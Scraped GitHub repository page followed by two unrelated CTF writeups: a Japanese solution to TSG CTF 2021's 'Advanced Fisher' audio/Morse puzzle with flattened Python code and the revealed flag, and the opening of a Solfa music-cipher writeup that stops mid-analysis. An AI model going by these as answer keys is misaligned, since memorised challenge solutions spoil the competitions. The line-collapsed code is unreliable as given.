<div > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom mr-1"> <path fill-rule="evenodd" d="M8 .25a.75.75 0 01.673.418l1.882 3.815 4.21.612a.75.75 0 01.416 1.279l-3.046 2.97.719 4.192a.75.75 0 01-1.088.791L8 12.347l-3.766 1.98a.75.75 0 01-1.088-.79l.72-4.194L.818 6.374a.75.75 0 01.416-1.28l4.21-.611L7.327.668A.75.75 0 018 .25zm0 2.445L6.615 5.5a.75.75 0 01-.564.41l-3.097.45 2.24 2.184a.75.75 0 01.216.664l-.528 3.084 2.769-1.456a.75.75 0 01.698 0l2.77 1.456-.53-3.084a.75.75 0 01.216-.664l2.24-2.183-3.096-.45a.75.75 0 01-.564-.41L8 2.694v.001z"></path></svg> <span> Star</span>
3 </div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked"> <path fill-rule="evenodd" d="M5 3.25a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm0 2.122a2.25 2.25 0 10-1.5 0v.878A2.25 2.25 0 005.75 8.5h1.5v2.128a2.251 2.251 0 101.5 0V8.5h1.5a2.25 2.25 0 002.25-2.25v-.878a2.25 2.25 0 10-1.5 0v.878a.75.75 0 01-.75.75h-4.5A.75.75 0 015 6.25v-.878zm3.75 7.378a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm3-8.75a.75.75 0 100-1.5.75.75 0 000 1.5z"></path></svg> Fork
0
</div>
<div id="responsive-meta-container" data-pjax-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M4.72 3.22a.75.75 0 011.06 1.06L2.06 8l3.72 3.72a.75.75 0 11-1.06 1.06L.47 8.53a.75.75 0 010-1.06l4.25-4.25zm6.56 0a.75.75 0 10-1.06 1.06L13.94 8l-3.72 3.72a.75.75 0 101.06 1.06l4.25-4.25a.75.75 0 000-1.06l-4.25-4.25z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path><path fill-rule="evenodd" d="M8 0a8 8 0 100 16A8 8 0 008 0zM1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0z"></path></svg> <span>Issues</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M7.177 3.073L9.573.677A.25.25 0 0110 .854v4.792a.25.25 0 01-.427.177L7.177 3.427a.25.25 0 010-.354zM3.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122v5.256a2.251 2.251 0 11-1.5 0V5.372A2.25 2.25 0 011.5 3.25zM11 2.5h-1V4h1a1 1 0 011 1v5.628a2.251 2.251 0 101.5 0V5A2.5 2.5 0 0011 2.5zm1 10.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0zM3.75 12a.75.75 0 100 1.5.75.75 0 000-1.5z"></path></svg> <span>Pull requests</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0zM8 0a8 8 0 100 16A8 8 0 008 0zM6.379 5.227A.25.25 0 006 5.442v5.117a.25.25 0 00.379.214l4.264-2.559a.25.25 0 000-.428L6.379 5.227z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M0 1.75A.75.75 0 01.75 1h4.253c1.227 0 2.317.59 3 1.501A3.744 3.744 0 0111.006 1h4.245a.75.75 0 01.75.75v10.5a.75.75 0 01-.75.75h-4.507a2.25 2.25 0 00-1.591.659l-.622.621a.75.75 0 01-1.06 0l-.622-.621A2.25 2.25 0 005.258 13H.75a.75.75 0 01-.75-.75V1.75zm8.755 3a2.25 2.25 0 012.25-2.25H14.5v9h-3.757c-.71 0-1.4.201-1.992.572l.004-7.322zm-1.504 7.324l.004-5.073-.002-2.253A2.25 2.25 0 005.003 2.5H1.5v9h3.757a3.75 3.75 0 011.994.574z"></path></svg> <span>Wiki</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M7.467.133a1.75 1.75 0 011.066 0l5.25 1.68A1.75 1.75 0 0115 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.7 1.7 0 01-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 011.217-1.667l5.25-1.68zm.61 1.429a.25.25 0 00-.153 0l-5.25 1.68a.25.25 0 00-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.2.2 0 00.154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.25.25 0 00-.174-.237l-5.25-1.68zM9 10.5a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.75a.75.75 0 10-1.5 0v3a.75.75 0 001.5 0v-3z"></path></svg> <span>Security</span> <include-fragment src="/0xM4hm0ud/CTF-Writeups/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 1.75a.75.75 0 00-1.5 0v12.5c0 .414.336.75.75.75h14.5a.75.75 0 000-1.5H1.5V1.75zm14.28 2.53a.75.75 0 00-1.06-1.06L10 7.94 7.53 5.47a.75.75 0 00-1.06 0L3.22 8.72a.75.75 0 001.06 1.06L7 7.06l2.47 2.47a.75.75 0 001.06 0l5.25-5.25z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path></svg> <span>More</span> </div></summary> <div data-view-component="true"> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Wiki Security Insights
</details-menu></div></details></div></nav> </div>
<div class="clearfix new-discussion-timeline container-xl px-3 px-md-4 px-lg-5"> <div id="repo-content-pjax-container" class="repository-content " >
<div> <div class="file-navigation mb-3 d-flex flex-items-start"> <div class="position-relative"> <details class="details-reset details-overlay mr-0 mb-0 " id="branch-select-menu"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path fill-rule="evenodd" d="M11.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122V6A2.5 2.5 0 0110 8.5H6a1 1 0 00-1 1v1.128a2.251 2.251 0 11-1.5 0V5.372a2.25 2.25 0 111.5 0v1.836A2.492 2.492 0 016 7h4a1 1 0 001-1v-.628A2.25 2.25 0 019.5 3.25zM4.25 12a.75.75 0 100 1.5.75.75 0 000-1.5zM3.5 3.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0z"></path></svg> <span>main</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" class="d-flex flex-column flex-auto overflow-auto" tabindex=""> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/0xM4hm0ud/CTF-Writeups/refs" cache-key="v0:1629839176.279113" current-committish="bWFpbg==" default-branch="bWFpbg==" name-with-owner="MHhNNGhtMHVkL0NURi1Xcml0ZXVwcw==" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " style="max-height: 330px" data-pjax="#repo-content-pjax-container"> <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" class="d-flex flex-column flex-auto overflow-auto" tabindex="" hidden> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/0xM4hm0ud/CTF-Writeups/refs" cache-key="v0:1629839176.279113" current-committish="bWFpbg==" default-branch="bWFpbg==" name-with-owner="MHhNNGhtMHVkL0NURi1Xcml0ZXVwcw==" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" style="max-height: 330px" data-pjax="#repo-content-pjax-container"> <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<div class="flex-1 mx-2 flex-self-center f4"> <div class="d-none d-sm-block"> <span><span><span>CTF-Writeups</span></span></span><span>/</span><span><span>TamilCTF</span></span><span>/</span><span><span>Crypto</span></span><span>/</span>aexor<span>/</span> </div> </div>
<div class="d-flex"> Go to file </div> </div>
<div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>CTF-Writeups</span></span></span><span>/</span><span><span>TamilCTF</span></span><span>/</span><span><span>Crypto</span></span><span>/</span>aexor<span>/</span></div>
<div class="Box mb-3"> <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-1 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/0xM4hm0ud/CTF-Writeups/tree-commit/5faa6be3bf621dedae87b3ed4df6a094896d7b42/TamilCTF/Crypto/aexor" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div></include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path fill-rule="evenodd" d="M1.643 3.143L.427 1.927A.25.25 0 000 2.104V5.75c0 .138.112.25.25.25h3.646a.25.25 0 00.177-.427L2.715 4.215a6.5 6.5 0 11-1.18 4.458.75.75 0 10-1.493.154 8.001 8.001 0 101.6-5.684zM7.75 4a.75.75 0 01.75.75v2.992l2.028.812a.75.75 0 01-.557 1.392l-2.5-1A.75.75 0 017 8.25v-3.5A.75.75 0 017.75 4z"></path></svg> <span> History </span> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2>
<include-fragment src="/0xM4hm0ud/CTF-Writeups/file-list/main/TamilCTF/Crypto/aexor"> Permalink
<div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> Failed to load latest commit information.
</div> <div class="js-details-container Details"> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block" data-pjax> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <span>. .</span> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div>
<div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-icon-tertiary"> <path fill-rule="evenodd" d="M3.75 1.5a.25.25 0 00-.25.25v11.5c0 .138.112.25.25.25h8.5a.25.25 0 00.25-.25V6H9.75A1.75 1.75 0 018 4.25V1.5H3.75zm5.75.56v2.19c0 .138.112.25.25.25h2.19L9.5 2.06zM2 1.75C2 .784 2.784 0 3.75 0h5.086c.464 0 .909.184 1.237.513l3.414 3.414c.329.328.513.773.513 1.237v8.086A1.75 1.75 0 0112.25 15h-8.5A1.75 1.75 0 012 13.25V1.75z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>flag.py</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> </div> </div>
</include-fragment>
</div>
</div>
</div></div>
</main> </div>
</div>
<div class="footer container-xl width-full p-responsive" role="contentinfo"> <div class="position-relative d-flex flex-row-reverse flex-lg-row flex-wrap flex-lg-nowrap flex-justify-center flex-lg-justify-between pt-6 pb-2 mt-6 f6 color-fg-muted border-top color-border-muted "> © 2021 GitHub, Inc. Terms Privacy Security Status Docs
<svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path></svg> Contact GitHub Pricing API Training Blog About </div> <div class="d-flex flex-justify-center pb-6"> <span></span> </div></div>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path fill-rule="evenodd" d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 010 1.5h-1.5a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-1.5a.75.75 0 011.5 0v1.5A1.75 1.75 0 019.25 16h-7.5A1.75 1.75 0 010 14.25v-7.5z"></path><path fill-rule="evenodd" d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0114.25 11h-7.5A1.75 1.75 0 015 9.25v-7.5zm1.75-.25a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25h-7.5z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-text-success d-none m-2"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> </clipboard-copy> </div></template>
</body></html>
|
# TSG CTF 2021: Advanced Fisher (Misc 365)
問題文にTSG LIVE CTF 6で出題された「Fisher」の派生問題だと書いてあるからまずはFisherを見る。
## 前提: Fisher概要: Wavファイルにエンコードされたフラグをデコードする問題。ただしフレームはシャッフルされている。
### Encodeフラグ文字列を`0`と`1`で表したモールス信号列`signals`に変換する。Wavファイルの`i`番目のフレームは`signals`の`i//2000`番目の要素が`0`であれば`0.0`、`1`であれば`np.sin(i * 439.97 / 44100 * (2 * np.pi)`とする。ただしファイルを出力する前にフレームをランダムにシャッフルする。サンプルレートは44100でPCMは24bit。モジュールはsoundfileを使用。
### Decode`f(i) = np.sin(i * 439.97 / 44100 * (2 * np.pi)`は今回の`i`の範囲であれば`i`と`f(i)`が一対一に対応するから、あり得る全ての`i`に対して実際に`f(i)`を計算して、エンコードされたWavファイルのフレームに存在するか比較すれば良い。
## Advanced FisherAdvanced Fisherでは上記`f(i) = np.sin(i * 439.97 / 44100 * (2 * np.pi)`が`f(i) = np.sin(i * 440 / 44100 * (2 * np.pi)`に変わった問題である。`439.97`が`440`に変わったことで`i`と`f(i)`が一対一に対応しなくなる。具体的には`gcd(440, 44100) = 20`で`i * 440 / 44100 = i * 22 / 2205`であるから`f(i) = f(i + 2205)`になり`2205`個ごとに値が循環する。`i`と`f(i)`が一対一に対応しないため`signals[i//2000] = 1`である`i//2000`を特定できずFisherと同じようにデコードはできない。
今回のデコードで利用できそうな性質は`signals`の`k`番目の要素が`1`であれば、Wavファイルのフレームに`f(2000 * k)`, `f(2000 * k + 1)`, ... , `f(2000 * k + 1999)`が含まれていることである。例え`f(i)`のとりうる値が`2205`種類しかなくても各種類の出現数がわかればその区間被覆から逆算できる。各種類の出現数列の階差数列を求め、正である要素を貪欲に選択すればよい。
コードは以下。```pyimport soundfile as sfimport numpy as npfrom utils import signals_to_string, string_to_signalsimport collections
result_frames, _ = sf.read("result.wav")frames_len = len(result_frames)signals_len = 473
# 実際にWavファイルに出力してsinの値を取り出すことで誤差を0にする。wave = np.array([np.sin(i * 440 / 44100 * (2 * np.pi)) for i in range(frames_len)])sf.write("base.wav", wave, 44100, "PCM_24")base_frames, _ = sf.read("base.wav")
T = 2205L = 2000
frame_to_t = {base_frames[t]: t for t in range(T)}
# 出現回数counts = [0] * Tfor frame in result_frames: assert frame in frame_to_t # 誤差があればエラー counts[frame_to_t[frame]] += 1counts[0] %= L
# 出現回数の階差数列count_diff = [counts[t] - counts[(t - 1 + T) % T] for t in range(T)]
interval_lefts = []while True: update = False for i in range(0, len(count_diff)): if count_diff[i] > 0: right = (L + i) % T interval_lefts.append(i) count_diff[i] -= 1 count_diff[right] += 1 update = True if not update: break
# フラグの先頭と末尾の区間が被ってしまうが、先頭はわかっているため末尾が一意に定まる。flag_head = "TSGCTF{"flag_head_signals = string_to_signals(flag_head)signals = []
for k in range(signals_len): left = k * 2000 % T if k < len(flag_head_signals): if flag_head_signals[k] == 1: signals.append(1) interval_lefts.remove(left) else: signals.append(0) else: if left in interval_lefts: signals.append(1) interval_lefts.remove(left) else: signals.append(0)
print(signals_to_string(signals))```
`TSGCTF{THE-TRUE-F1SHERM4N-U53S-M0RSE-CODE}` |
Let's begin with the files we've been given, [Doe a deer.pdf](https://file.io/fXhyPu7eEucb) and tune_700.mp3.
Lets get started by analyzing the files. A quick look at the pdf file reveals that it is a Music Sheet Cipher. Cool. Let's see whether there's a deciphering tool available online. A quick google search for Music Sheet cipher decoding tool takes us to [dcode.fr](https://www.dcode.fr/music-sheet-cipher). I tried decoding it, but the tool gave me gibberish. As it turns out, it wasn't Music Sheet Cipher to begin with. What was it then? Let's go back to our old pal Google and search for Music Sheet Ciphers. The second search from the top leads to [this website](https://wmich.edu/mus-theo/solfa-cipher), which is a Solfa Cipher online encoding tool. Let's try encoding something and check whether the result matches the ciphertext we've been given.
Hmm. It does in a way. Let's play about with it a little and see if we can come up with a ciphertext that's similar to the pdf one. I couldn't do it. However, we're certain it's Solfa Cipher now. Cool. Let's find an online decoder and get the flag. Child's play right? But guess what? There's no online decoding tool for it ;). We will have to decipher it manually.
Back to google, I found [this writeup](https://www.deepcode.ca/index.php/2017/06/10/the-solfa-cipher-nsec17-write-up/) from 2017 which states `Each note is linked to the seven pitches of the solfege, i.e. Do (D), Re (R), Mi (M), Fa (F), Sol (S), La (L) and Si(T).`
